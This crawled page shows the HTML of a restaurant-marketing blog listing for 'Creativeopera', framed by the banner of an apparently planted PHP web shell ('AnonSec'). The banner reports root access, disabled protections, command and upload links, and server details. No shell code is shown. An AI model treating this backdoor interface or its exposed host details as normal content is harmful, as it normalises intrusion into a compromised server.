|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../boundlessicon.com/../creativeopera.org/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Blog - Creativeopera</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
html {
scroll-behavior: smooth;
}
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="bg-gradient-to-r from-emerald-600 to-lime-600 text-white fixed w-full z-50 top-0">
<div class="max-w-screen-xl mx-auto px-6 py-2 flex items-center justify-between">
<a href="./" class="flex items-center space-x-3">
<span class="text-3xl font-black tracking-tight">Creativeopera</span>
<span class="px-3 py-1 text-xs font-semibold uppercase bg-white/20 rounded-full">Since 2021</span>
</a>
<div class="hidden md:flex items-center space-x-8">
<a href="#services" class="font-semibold hover:text-white/80 transition">Services</a>
<a href="#features" class="font-semibold hover:text-white/80 transition">Features</a>
<a href="#about" class="font-semibold hover:text-white/80 transition">About</a>
<a href="#testimonials" class="font-semibold hover:text-white/80 transition">Testimonials</a>
</div>
<div class="hidden md:flex items-center space-x-4">
<a href="mailto:hello@creativeopera.org" class="text-sm text-white/80">hello@creativeopera.org</a>
<a href="#contact" class="px-6 py-3 bg-white text-emerald-600 font-bold rounded-full shadow-lg hover:shadow-xl transition">Book a Call</a>
</div>
<button data-collapse-toggle="navbar-14" type="button" class="md:hidden inline-flex items-center justify-center w-11 h-11 rounded-xl bg-white/10">
<svg class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" />
</svg>
</button>
</div>
<div class="hidden bg-white text-gray-900" id="navbar-14">
<div class="px-6 py-4 space-y-4">
<a href="#services" class="block font-semibold">Services</a>
<a href="#features" class="block font-semibold">Features</a>
<a href="#about" class="block font-semibold">About</a>
<a href="#testimonials" class="block font-semibold">Testimonials</a>
<a href="#contact" class="inline-flex justify-center items-center w-full px-5 py-3 rounded-lg bg-gradient-to-r from-emerald-600 to-lime-600 text-white font-semibold">Book a Call</a>
</div>
</div>
</nav>
<section class="bg-white py-16 min-h-screen">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-12">
<h1 class="text-5xl font-black text-gray-900 mb-4">Our Blog</h1>
<p class="text-xl text-gray-600 max-w-2xl mx-auto">Insights, tips, and stories from our team</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-3 gap-8">
<article class="bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all group border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/3298634/pexels-photo-3298634.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Chef Collective Innovation Hubs" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/60 to-transparent"></div>
<div class="absolute bottom-4 left-4">
<span class="px-3 py-1 bg-emerald-600 text-white text-xs font-semibold rounded-full">Innovation</span>
</div>
</div>
<div class="p-6">
<div class="flex items-center text-sm text-gray-500 mb-3">
<span>February 4, 2026</span>
<span class="mx-2">•</span>
<span>Sarah Johnson</span>
</div>
<h2 class="text-xl font-bold text-gray-900 mb-3 group-hover:text-emerald-600 transition-colors">
<a href="/blog/chef-collective-innovation-hubs/">Chef Collective Innovation Hubs</a>
</h2>
<p class="text-gray-600 mb-4 leading-relaxed">Chef collective innovation hubs let multi-brand restaurant groups prototype menus, tech, and training in 2025.</p>
<a href="/blog/chef-collective-innovation-hubs/" class="inline-flex items-center text-emerald-600 font-semibold group-hover:gap-2 transition-all">
Read more
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
<article class="bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all group border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/5779787/pexels-photo-5779787.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Mastering Restaurant Management: Strategies for Success and Growth" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/60 to-transparent"></div>
<div class="absolute bottom-4 left-4">
<span class="px-3 py-1 bg-emerald-600 text-white text-xs font-semibold rounded-full">General</span>
</div>
</div>
<div class="p-6">
<div class="flex items-center text-sm text-gray-500 mb-3">
<span>February 3, 2026</span>
<span class="mx-2">•</span>
<span>Dr. Maya Singh</span>
</div>
<h2 class="text-xl font-bold text-gray-900 mb-3 group-hover:text-emerald-600 transition-colors">
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/">Mastering Restaurant Management: Strategies for Success and Growth</a>
</h2>
<p class="text-gray-600 mb-4 leading-relaxed">In the competitive world of restaurant management, staying ahead requires a blend of strategic planning, operational eff...</p>
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/" class="inline-flex items-center text-emerald-600 font-semibold group-hover:gap-2 transition-all">
Read more
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
<article class="bg-white rounded-2xl overflow-hidden shadow-lg hover:shadow-2xl transition-all group border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/3184192/pexels-photo-3184192.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Zero-Waste Commissary Networks" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/60 to-transparent"></div>
<div class="absolute bottom-4 left-4">
<span class="px-3 py-1 bg-emerald-600 text-white text-xs font-semibold rounded-full">Sustainability</span>
</div>
</div>
<div class="p-6">
<div class="flex items-center text-sm text-gray-500 mb-3">
<span>February 2, 2026</span>
<span class="mx-2">•</span>
<span>David Wilson</span>
</div>
<h2 class="text-xl font-bold text-gray-900 mb-3 group-hover:text-emerald-600 transition-colors">
<a href="/blog/zero-waste-commissary-networks/">Zero-Waste Commissary Networks</a>
</h2>
<p class="text-gray-600 mb-4 leading-relaxed">Zero-waste commissary networks redistribute surplus ingredients across brands and donation channels in 2025.</p>
<a href="/blog/zero-waste-commissary-networks/" class="inline-flex items-center text-emerald-600 font-semibold group-hover:gap-2 transition-all">
Read more
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
</div>
</div>
</section>
<footer class="bg-white">
<div class="max-w-screen-xl mx-auto px-6 py-16">
<div class="grid md:grid-cols-4 gap-10">
<div class="col-span-2 space-y-6">
<a href="./" class="inline-flex items-center space-x-3">
<span class="text-3xl font-black text-gray-900">Creativeopera</span>
</a>
<p class="text-gray-500 max-w-lg">We combine design, automation, and storytelling to help restaurant innovators launch, scale, and lead.</p>
<div class="flex items-center space-x-4 text-gray-500 text-sm">
<span class="flex items-center space-x-2"><i class="fas fa-clock text-emerald-600"></i><span>Mon-Fri 8am-6pm</span></span>
<span class="flex items-center space-x-2"><i class="fas fa-map-marker-alt text-emerald-600"></i><span>963 Arizona Avenue, Phoenix, AZ 85003</span></span>
</div>
</div>
<div>
<h3 class="text-lg font-semibold text-gray-900 mb-4">Quick Links</h3>
<ul class="space-y-3 text-gray-500">
<li><a href="#services" class="hover:text-emerald-600 transition">Services</a></li>
<li><a href="#features" class="hover:text-emerald-600 transition">Features</a></li>
<li><a href="#about" class="hover:text-emerald-600 transition">About</a></li>
<li><a href="blog/" class="hover:text-emeraldBlog</a></li>
<li><a href="#testimonials" class="hover:text-emerald-600 transition">Testimonials</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-semibold text-gray-900 mb-4">Let’s Talk</h3>
<div class="space-y-3 text-gray-500">
<p>Ready to transform your restaurant presence? Let’s build your roadmap.</p>
<a href="./contact.php" class="inline-flex items-center space-x-2 px-5 py-3 rounded-xl bg-gray-900 text-white font-semibold hover:bg-emerald-600 transition">
<span>Book a session</span>
<i class="fas fa-arrow-right"></i>
</a>
</div>
</div>
</div>
<div class="border-t border-gray-200 mt-12 pt-8 flex flex-col md:flex-row md:items-center md:justify-between text-sm text-gray-500">
<span>© 2026 Creativeopera. All rights reserved.</span>
<div class="flex space-x-6 mt-4 md:mt-0">
<a href="./privacy.php" class="hover:text-emerald-600 transition">Privacy</a>
<a href="./terms.php" class="hover:text-emerald-600 transition">Terms</a>
<a href="./disclaimer.php" class="hover:text-emerald-600 transition">Disclaimer</a>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function() {
const paginationLinks = document.querySelectorAll('a[href*="?page="]');
paginationLinks.forEach(link => {
link.addEventListener('click', function(e) {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
});
});
});
window.addEventListener('load', function() {
if (window.location.search.includes('page=')) {
setTimeout(function() {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
}, 100);
}
});
</script>
</body>
</html>
AnonSec - 2021